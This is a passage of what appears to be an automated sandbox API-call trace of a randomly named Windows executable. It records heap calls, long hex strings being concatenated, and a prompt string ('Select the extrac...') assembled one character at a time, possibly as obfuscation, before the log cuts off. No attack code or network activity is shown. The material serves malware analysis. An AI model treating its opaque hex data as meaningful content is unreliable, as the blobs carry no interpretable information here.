[0075.464] SetLastError (dwErrCode=0x0) [0075.464] wcslen (_String="350583A4FC1C9BBC24380A6A2177AF95E727C78A") returned 0x28 [0075.464] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64bf8, Size=0x5a) returned 0x2a64bf8 [0075.464] GetLastError () returned 0x0 [0075.464] SetLastError (dwErrCode=0x0) [0075.464] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE1414E454795409646911251817EBF527D44109651A299A3963494F91D25C8AF26AC4ADD96F66DE5B2DB51863AEBA2EEA48BEA1E93A2B15AE1159E07B") returned 0xa0 [0075.464] wcslen (_String="350583A4FC1C9BBC24380A6A2177AF95E727C78A") returned 0x28 [0075.465] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64c60, Size=0x19a) returned 0x2a64c60 [0075.465] GetLastError () returned 0x0 [0075.465] SetLastError (dwErrCode=0x0) [0075.465] wcslen (_String="3CF300CF07B69622AA23D1B677935ABEC3D118CE") returned 0x28 [0075.465] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64bf8, Size=0x5a) returned 0x2a64bf8 [0075.465] GetLastError () returned 0x0 [0075.465] SetLastError (dwErrCode=0x0) [0075.465] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE1414E454795409646911251817EBF527D44109651A299A3963494F91D25C8AF26AC4ADD96F66DE5B2DB51863AEBA2EEA48BEA1E93A2B15AE1159E07B350583A4FC1C9BBC24380A6A2177AF95E727C78A") returned 0xc8 [0075.465] wcslen (_String="3CF300CF07B69622AA23D1B677935ABEC3D118CE") returned 0x28 [0075.465] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64c60, Size=0x1ea) returned 0x2a64c60 [0075.465] GetLastError () returned 0x0 [0075.465] SetLastError (dwErrCode=0x0) [0075.465] wcslen (_String="77D24276301AC0DB4D0DBAE41E04C4D0D06375BB") returned 0x28 [0075.465] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64bf8, Size=0x5a) returned 0x2a64bf8 [0075.465] GetLastError () returned 0x0 [0075.465] SetLastError (dwErrCode=0x0) [0075.465] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE1414E454795409646911251817EBF527D44109651A299A3963494F91D25C8AF26AC4ADD96F66DE5B2DB51863AEBA2EEA48BEA1E93A2B15AE1159E07B350583A4FC1C9BBC24380A6A2177AF95E727C78A3CF300CF07B69622AA23D1B677935ABEC3D118CE") returned 0xf0 [0075.466] wcslen (_String="77D24276301AC0DB4D0DBAE41E04C4D0D06375BB") returned 0x28 [0075.466] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64c60, Size=0x23a) returned 0x2a64c60 [0075.466] GetLastError () returned 0x0 [0075.466] SetLastError (dwErrCode=0x0) [0075.466] wcslen (_String="910FC5FDA32AFE86F049EF1D6A165FAAF8D69493") returned 0x28 [0075.466] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64bf8, Size=0x5a) returned 0x2a64bf8 [0075.466] GetLastError () returned 0x0 [0075.466] SetLastError (dwErrCode=0x0) [0075.466] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE1414E454795409646911251817EBF527D44109651A299A3963494F91D25C8AF26AC4ADD96F66DE5B2DB51863AEBA2EEA48BEA1E93A2B15AE1159E07B350583A4FC1C9BBC24380A6A2177AF95E727C78A3CF300CF07B69622AA23D1B677935ABEC3D118CE77D24276301AC0DB4D0DBAE41E04C4D0D06375BB") returned 0x118 [0075.466] wcslen (_String="910FC5FDA32AFE86F049EF1D6A165FAAF8D69493") returned 0x28 [0075.466] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64c60, Size=0x28a) returned 0x2a64c60 [0075.466] GetLastError () returned 0x0 [0075.466] SetLastError (dwErrCode=0x0) [0075.466] wcslen (_String="A1B83245DF") returned 0xa [0075.466] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64bf8, Size=0x1e) returned 0x2a64bf8 [0075.466] GetLastError () returned 0x0 [0075.466] SetLastError (dwErrCode=0x0) [0075.466] wcslen (_String="A1B83245DF") returned 0xa [0075.467] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a64c20 [0075.467] GetLastError () returned 0x0 [0075.467] SetLastError (dwErrCode=0x0) [0075.467] wcslen (_String="B5D7C8559F3EFA10E7B554CBD10E295D") returned 0x20 [0075.467] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64bf8, Size=0x4a) returned 0x2a64ef8 [0075.467] GetLastError () returned 0x0 [0075.467] SetLastError (dwErrCode=0x0) [0075.467] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE1414E454795409646911251817EBF527D44109651A299A3963494F91D25C8AF26AC4ADD96F66DE5B2DB51863AEBA2EEA48BEA1E93A2B15AE1159E07B350583A4FC1C9BBC24380A6A2177AF95E727C78A3CF300CF07B69622AA23D1B677935ABEC3D118CE77D24276301AC0DB4D0DBAE41E04C4D0D06375BB910FC5FDA32AFE86F049EF1D6A165FAAF8D69493") returned 0x140 [0075.467] wcslen (_String="B5D7C8559F3EFA10E7B554CBD10E295D") returned 0x20 [0075.467] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64c60, Size=0x2ca) returned 0x2a64f50 [0075.467] GetLastError () returned 0x0 [0075.467] SetLastError (dwErrCode=0x0) [0075.468] wcslen (_String="CC1A42CA2429AFFCE2D176556742D0F7") returned 0x20 [0075.468] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64ef8, Size=0x4a) returned 0x2a64ef8 [0075.468] GetLastError () returned 0x0 [0075.468] SetLastError (dwErrCode=0x0) [0075.468] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE1414E454795409646911251817EBF527D44109651A299A3963494F91D25C8AF26AC4ADD96F66DE5B2DB51863AEBA2EEA48BEA1E93A2B15AE1159E07B350583A4FC1C9BBC24380A6A2177AF95E727C78A3CF300CF07B69622AA23D1B677935ABEC3D118CE77D24276301AC0DB4D0DBAE41E04C4D0D06375BB910FC5FDA32AFE86F049EF1D6A165FAAF8D69493B5D7C8559F3EFA10E7B554CBD10E295D") returned 0x160 [0075.468] wcslen (_String="CC1A42CA2429AFFCE2D176556742D0F7") returned 0x20 [0075.468] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64f50, Size=0x30a) returned 0x2a64f50 [0075.468] GetLastError () returned 0x0 [0075.468] SetLastError (dwErrCode=0x0) [0075.468] wcslen (_String="D23B969028E1BB57294F40E5F1DA1C6E29DC8C1F") returned 0x28 [0075.468] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64ef8, Size=0x5a) returned 0x2a64c48 [0075.468] GetLastError () returned 0x0 [0075.468] SetLastError (dwErrCode=0x0) [0075.468] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE1414E454795409646911251817EBF527D44109651A299A3963494F91D25C8AF26AC4ADD96F66DE5B2DB51863AEBA2EEA48BEA1E93A2B15AE1159E07B350583A4FC1C9BBC24380A6A2177AF95E727C78A3CF300CF07B69622AA23D1B677935ABEC3D118CE77D24276301AC0DB4D0DBAE41E04C4D0D06375BB910FC5FDA32AFE86F049EF1D6A165FAAF8D69493B5D7C8559F3EFA10E7B554CBD10E295DCC1A42CA2429AFFCE2D176556742D0F7") returned 0x180 [0075.468] wcslen (_String="D23B969028E1BB57294F40E5F1DA1C6E29DC8C1F") returned 0x28 [0075.468] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64f50, Size=0x35a) returned 0x2a64f50 [0075.468] GetLastError () returned 0x0 [0075.468] SetLastError (dwErrCode=0x0) [0075.468] wcslen (_String="ED335210FCBAA319E81C5BA517A7F44E2FDAF856") returned 0x28 [0075.468] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64c48, Size=0x5a) returned 0x2a64c48 [0075.468] GetLastError () returned 0x0 [0075.469] SetLastError (dwErrCode=0x0) [0075.469] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE1414E454795409646911251817EBF527D44109651A299A3963494F91D25C8AF26AC4ADD96F66DE5B2DB51863AEBA2EEA48BEA1E93A2B15AE1159E07B350583A4FC1C9BBC24380A6A2177AF95E727C78A3CF300CF07B69622AA23D1B677935ABEC3D118CE77D24276301AC0DB4D0DBAE41E04C4D0D06375BB910FC5FDA32AFE86F049EF1D6A165FAAF8D69493B5D7C8559F3EFA10E7B554CBD10E295DCC1A42CA2429AFFCE2D176556742D0F7D23B969028E1BB57294F40E5F1DA1C6E29DC8C1F") returned 0x1a8 [0075.469] wcslen (_String="ED335210FCBAA319E81C5BA517A7F44E2FDAF856") returned 0x28 [0075.469] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64f50, Size=0x3aa) returned 0x2a64f50 [0075.469] GetLastError () returned 0x0 [0075.469] SetLastError (dwErrCode=0x0) [0075.469] wcslen (_String="FA3B0010DD960EC64DFF4C9EFF54C06A") returned 0x20 [0075.469] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64c48, Size=0x4a) returned 0x2a64c48 [0075.469] GetLastError () returned 0x0 [0075.469] SetLastError (dwErrCode=0x0) [0075.469] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE1414E454795409646911251817EBF527D44109651A299A3963494F91D25C8AF26AC4ADD96F66DE5B2DB51863AEBA2EEA48BEA1E93A2B15AE1159E07B350583A4FC1C9BBC24380A6A2177AF95E727C78A3CF300CF07B69622AA23D1B677935ABEC3D118CE77D24276301AC0DB4D0DBAE41E04C4D0D06375BB910FC5FDA32AFE86F049EF1D6A165FAAF8D69493B5D7C8559F3EFA10E7B554CBD10E295DCC1A42CA2429AFFCE2D176556742D0F7D23B969028E1BB57294F40E5F1DA1C6E29DC8C1FED335210FCBAA319E81C5BA517A7F44E2FDAF856") returned 0x1d0 [0075.469] wcslen (_String="FA3B0010DD960EC64DFF4C9EFF54C06A") returned 0x20 [0075.469] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64f50, Size=0x3ea) returned 0x2a64f50 [0075.469] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a646b8 | out: hHeap=0x2a60000) returned 1 [0075.469] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64720 | out: hHeap=0x2a60000) returned 1 [0075.469] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64788 | out: hHeap=0x2a60000) returned 1 [0075.469] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a647f0 | out: hHeap=0x2a60000) returned 1 [0075.470] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64858 | out: hHeap=0x2a60000) returned 1 [0075.470] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a648c0 | out: hHeap=0x2a60000) returned 1 [0075.470] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64928 | out: hHeap=0x2a60000) returned 1 [0075.470] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64990 | out: hHeap=0x2a60000) returned 1 [0075.470] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a649f8 | out: hHeap=0x2a60000) returned 1 [0075.470] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64a20 | out: hHeap=0x2a60000) returned 1 [0075.470] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64a78 | out: hHeap=0x2a60000) returned 1 [0075.470] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64ad0 | out: hHeap=0x2a60000) returned 1 [0075.470] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64b38 | out: hHeap=0x2a60000) returned 1 [0075.470] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64ba0 | out: hHeap=0x2a60000) returned 1 [0075.470] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91088 | out: hHeap=0x2a90000) returned 1 [0075.470] GetLastError () returned 0x0 [0075.470] SetLastError (dwErrCode=0x0) [0075.470] GetLastError () returned 0x0 [0075.470] SetLastError (dwErrCode=0x0) [0075.470] GetLastError () returned 0x0 [0075.471] SetLastError (dwErrCode=0x0) [0075.471] GetLastError () returned 0x0 [0075.471] SetLastError (dwErrCode=0x0) [0075.471] GetLastError () returned 0x0 [0075.471] SetLastError (dwErrCode=0x0) [0075.471] GetLastError () returned 0x0 [0075.471] SetLastError (dwErrCode=0x0) [0075.471] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x9c) returned 0x2a91088 [0075.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A60C45FFE9C4FFD46CE069DD0100B3AF658FADF2E44F7A715AB5C18E913AABCF012533DEF1C8CD92E6C1AD1F5E04F49275BB1E820969B32D7F0D247655671D2ECFFA9242AC24A1CCD592E01DBC455B7E01AFE3F9558C7D5B39496D8FAAF561A6D1FE940F68EFA23ADF5CF019BB57360D0D4C40E14EABD0D4BD0CA10367242D77EC811D3CEBA539776B1D32AA22696B70FC003FC3A87C727E59FA7712A6A08342CBB9C1CF4A385053B70E9511EA51B2A39E1AEB84AEE2ABEA36815BD2B5ED66F69DDA4CA62FA8C52D19F4943693A992A15690144D725FBE718152119646904597454E4141EFB649238D92C501591499BF55FAA9B00D7189C0", cchWideChar=497, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 497 [0075.471] malloc (_Size=0x1f2) returned 0x11224f0 [0075.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A60C45FFE9C4FFD46CE069DD0100B3AF658FADF2E44F7A715AB5C18E913AABCF012533DEF1C8CD92E6C1AD1F5E04F49275BB1E820969B32D7F0D247655671D2ECFFA9242AC24A1CCD592E01DBC455B7E01AFE3F9558C7D5B39496D8FAAF561A6D1FE940F68EFA23ADF5CF019BB57360D0D4C40E14EABD0D4BD0CA10367242D77EC811D3CEBA539776B1D32AA22696B70FC003FC3A87C727E59FA7712A6A08342CBB9C1CF4A385053B70E9511EA51B2A39E1AEB84AEE2ABEA36815BD2B5ED66F69DDA4CA62FA8C52D19F4943693A992A15690144D725FBE718152119646904597454E4141EFB649238D92C501591499BF55FAA9B00D7189C0", cchWideChar=497, lpMultiByteStr=0x11224f0, cbMultiByte=497, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A60C45FFE9C4FFD46CE069DD0100B3AF658FADF2E44F7A715AB5C18E913AABCF012533DEF1C8CD92E6C1AD1F5E04F49275BB1E820969B32D7F0D247655671D2ECFFA9242AC24A1CCD592E01DBC455B7E01AFE3F9558C7D5B39496D8FAAF561A6D1FE940F68EFA23ADF5CF019BB57360D0D4C40E14EABD0D4BD0CA10367242D77EC811D3CEBA539776B1D32AA22696B70FC003FC3A87C727E59FA7712A6A08342CBB9C1CF4A385053B70E9511EA51B2A39E1AEB84AEE2ABEA36815BD2B5ED66F69DDA4CA62FA8C52D19F4943693A992A15690144D725FBE718152119646904597454E4141EFB649238D92C501591499BF55FAA9B00D7189C0", lpUsedDefaultChar=0x0) returned 497 [0075.471] free (_Block=0x11224f0) [0075.471] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91088 | out: hHeap=0x2a90000) returned 1 [0075.471] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a64ca0 [0075.471] GetLastError () returned 0x0 [0075.471] SetLastError (dwErrCode=0x0) [0075.471] wcslen (_String="FBE3A62B336533AC94F6BC8B8C2DDB30") returned 0x20 [0075.472] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a64cf8 [0075.472] GetLastError () returned 0x0 [0075.472] SetLastError (dwErrCode=0x0) [0075.472] GetLastError () returned 0x0 [0075.472] SetLastError (dwErrCode=0x0) [0075.472] GetLastError () returned 0x0 [0075.472] SetLastError (dwErrCode=0x0) [0075.472] GetLastError () returned 0x0 [0075.472] SetLastError (dwErrCode=0x0) [0075.472] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x9c) returned 0x2a91088 [0075.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FBE3A62B336533AC94F6BC8B8C2DDB30", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0075.472] malloc (_Size=0x22) returned 0x1121150 [0075.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FBE3A62B336533AC94F6BC8B8C2DDB30", cchWideChar=33, lpMultiByteStr=0x1121150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FBE3A62B336533AC94F6BC8B8C2DDB30", lpUsedDefaultChar=0x0) returned 33 [0075.472] free (_Block=0x1121150) [0075.472] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91088 | out: hHeap=0x2a90000) returned 1 [0075.472] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64ca0, Size=0x4a) returned 0x2a64ca0 [0075.472] GetLastError () returned 0x0 [0075.472] SetLastError (dwErrCode=0x0) [0075.472] GetLastError () returned 0x0 [0075.473] SetLastError (dwErrCode=0x0) [0075.473] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64ca0, Size=0x1e) returned 0x2a64ca0 [0075.473] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe\" " [0075.473] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64c48 | out: hHeap=0x2a60000) returned 1 [0075.473] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64c20 | out: hHeap=0x2a60000) returned 1 [0075.473] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64f50 | out: hHeap=0x2a60000) returned 1 [0075.473] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64cf8 | out: hHeap=0x2a60000) returned 1 [0075.473] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64ca0 | out: hHeap=0x2a60000) returned 1 [0075.473] GetLastError () returned 0x0 [0075.473] SetLastError (dwErrCode=0x0) [0075.473] GetLastError () returned 0x0 [0075.473] SetLastError (dwErrCode=0x0) [0075.473] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a605c0 [0075.473] GetLastError () returned 0x0 [0075.473] SetLastError (dwErrCode=0x0) [0075.473] wcslen (_String="S") returned 0x1 [0075.473] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a646b8 [0075.473] GetLastError () returned 0x0 [0075.473] SetLastError (dwErrCode=0x0) [0075.474] GetLastError () returned 0x0 [0075.474] SetLastError (dwErrCode=0x0) [0075.474] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.474] GetLastError () returned 0x0 [0075.474] SetLastError (dwErrCode=0x0) [0075.474] wcslen (_String="S") returned 0x1 [0075.474] wcslen (_String="e") returned 0x1 [0075.474] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0xe) returned 0x2a646b8 [0075.474] GetLastError () returned 0x0 [0075.474] SetLastError (dwErrCode=0x0) [0075.474] GetLastError () returned 0x0 [0075.474] SetLastError (dwErrCode=0x0) [0075.474] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.474] GetLastError () returned 0x0 [0075.474] SetLastError (dwErrCode=0x0) [0075.474] wcslen (_String="Se") returned 0x2 [0075.474] wcslen (_String="l") returned 0x1 [0075.474] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x10) returned 0x2a646b8 [0075.474] GetLastError () returned 0x0 [0075.474] SetLastError (dwErrCode=0x0) [0075.475] GetLastError () returned 0x0 [0075.475] SetLastError (dwErrCode=0x0) [0075.475] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.475] GetLastError () returned 0x0 [0075.475] SetLastError (dwErrCode=0x0) [0075.475] wcslen (_String="Sel") returned 0x3 [0075.475] wcslen (_String="e") returned 0x1 [0075.475] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x12) returned 0x2a646b8 [0075.475] GetLastError () returned 0x0 [0075.475] SetLastError (dwErrCode=0x0) [0075.475] GetLastError () returned 0x0 [0075.475] SetLastError (dwErrCode=0x0) [0075.475] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.475] GetLastError () returned 0x0 [0075.475] SetLastError (dwErrCode=0x0) [0075.475] wcslen (_String="Sele") returned 0x4 [0075.475] wcslen (_String="c") returned 0x1 [0075.475] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x14) returned 0x2a646b8 [0075.475] GetLastError () returned 0x0 [0075.475] SetLastError (dwErrCode=0x0) [0075.475] GetLastError () returned 0x0 [0075.476] SetLastError (dwErrCode=0x0) [0075.476] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.476] GetLastError () returned 0x0 [0075.476] SetLastError (dwErrCode=0x0) [0075.476] wcslen (_String="Selec") returned 0x5 [0075.476] wcslen (_String="t") returned 0x1 [0075.476] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x16) returned 0x2a646b8 [0075.476] GetLastError () returned 0x0 [0075.476] SetLastError (dwErrCode=0x0) [0075.476] GetLastError () returned 0x0 [0075.476] SetLastError (dwErrCode=0x0) [0075.476] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.476] GetLastError () returned 0x0 [0075.476] SetLastError (dwErrCode=0x0) [0075.476] wcslen (_String="Select") returned 0x6 [0075.476] wcslen (_String=" ") returned 0x1 [0075.476] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x18) returned 0x2a646b8 [0075.476] GetLastError () returned 0x0 [0075.476] SetLastError (dwErrCode=0x0) [0075.476] GetLastError () returned 0x0 [0075.477] SetLastError (dwErrCode=0x0) [0075.477] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.477] GetLastError () returned 0x0 [0075.477] SetLastError (dwErrCode=0x0) [0075.477] wcslen (_String="Select ") returned 0x7 [0075.477] wcslen (_String="t") returned 0x1 [0075.477] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x1a) returned 0x2a646b8 [0075.477] GetLastError () returned 0x0 [0075.477] SetLastError (dwErrCode=0x0) [0075.477] GetLastError () returned 0x0 [0075.477] SetLastError (dwErrCode=0x0) [0075.477] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.477] GetLastError () returned 0x0 [0075.477] SetLastError (dwErrCode=0x0) [0075.477] wcslen (_String="Select t") returned 0x8 [0075.477] wcslen (_String="h") returned 0x1 [0075.477] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x1c) returned 0x2a646b8 [0075.477] GetLastError () returned 0x0 [0075.477] SetLastError (dwErrCode=0x0) [0075.477] GetLastError () returned 0x0 [0075.478] SetLastError (dwErrCode=0x0) [0075.478] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.478] GetLastError () returned 0x0 [0075.478] SetLastError (dwErrCode=0x0) [0075.478] wcslen (_String="Select th") returned 0x9 [0075.478] wcslen (_String="e") returned 0x1 [0075.478] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x1e) returned 0x2a646b8 [0075.478] GetLastError () returned 0x0 [0075.478] SetLastError (dwErrCode=0x0) [0075.478] GetLastError () returned 0x0 [0075.478] SetLastError (dwErrCode=0x0) [0075.478] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.478] GetLastError () returned 0x0 [0075.478] SetLastError (dwErrCode=0x0) [0075.478] wcslen (_String="Select the") returned 0xa [0075.478] wcslen (_String=" ") returned 0x1 [0075.478] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x20) returned 0x2a646b8 [0075.478] GetLastError () returned 0x0 [0075.479] SetLastError (dwErrCode=0x0) [0075.479] GetLastError () returned 0x0 [0075.479] SetLastError (dwErrCode=0x0) [0075.479] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.479] GetLastError () returned 0x0 [0075.479] SetLastError (dwErrCode=0x0) [0075.479] wcslen (_String="Select the ") returned 0xb [0075.479] wcslen (_String="e") returned 0x1 [0075.479] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x22) returned 0x2a646b8 [0075.479] GetLastError () returned 0x0 [0075.479] SetLastError (dwErrCode=0x0) [0075.479] GetLastError () returned 0x0 [0075.479] SetLastError (dwErrCode=0x0) [0075.479] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.479] GetLastError () returned 0x0 [0075.479] SetLastError (dwErrCode=0x0) [0075.479] wcslen (_String="Select the e") returned 0xc [0075.480] wcslen (_String="x") returned 0x1 [0075.480] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x24) returned 0x2a646b8 [0075.480] GetLastError () returned 0x0 [0075.480] SetLastError (dwErrCode=0x0) [0075.480] GetLastError () returned 0x0 [0075.480] SetLastError (dwErrCode=0x0) [0075.480] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.480] GetLastError () returned 0x0 [0075.480] SetLastError (dwErrCode=0x0) [0075.480] wcslen (_String="Select the ex") returned 0xd [0075.480] wcslen (_String="t") returned 0x1 [0075.480] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x26) returned 0x2a646b8 [0075.480] GetLastError () returned 0x0 [0075.480] SetLastError (dwErrCode=0x0) [0075.480] GetLastError () returned 0x0 [0075.481] SetLastError (dwErrCode=0x0) [0075.481] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.481] GetLastError () returned 0x0 [0075.481] SetLastError (dwErrCode=0x0) [0075.481] wcslen (_String="Select the ext") returned 0xe [0075.481] wcslen (_String="r") returned 0x1 [0075.481] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x28) returned 0x2a646b8 [0075.481] GetLastError () returned 0x0 [0075.481] SetLastError (dwErrCode=0x0) [0075.481] GetLastError () returned 0x0 [0075.481] SetLastError (dwErrCode=0x0) [0075.481] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.482] GetLastError () returned 0x0 [0075.482] SetLastError (dwErrCode=0x0) [0075.482] wcslen (_String="Select the extr") returned 0xf [0075.482] wcslen (_String="a") returned 0x1 [0075.482] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x2a) returned 0x2a646b8 [0075.482] GetLastError () returned 0x0 [0075.482] SetLastError (dwErrCode=0x0) [0075.482] GetLastError () returned 0x0 [0075.482] SetLastError (dwErrCode=0x0) [0075.482] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.482] GetLastError () returned 0x0 [0075.482] SetLastError (dwErrCode=0x0) [0075.482] wcslen (_String="Select the extra") returned 0x10 [0075.482] wcslen (_String="c") returned 0x1 [0075.482] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x2c) returned 0x2a646b8 [0075.482] GetLastError () returned 0x0 [0075.482] SetLastError (dwErrCode=0x0) [0075.482] GetLastError () returned 0x0 [0075.482] SetLastError (dwErrCode=0x0) [0075.483] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.483] GetLastError () returned 0x0 [0075.483] SetLastError 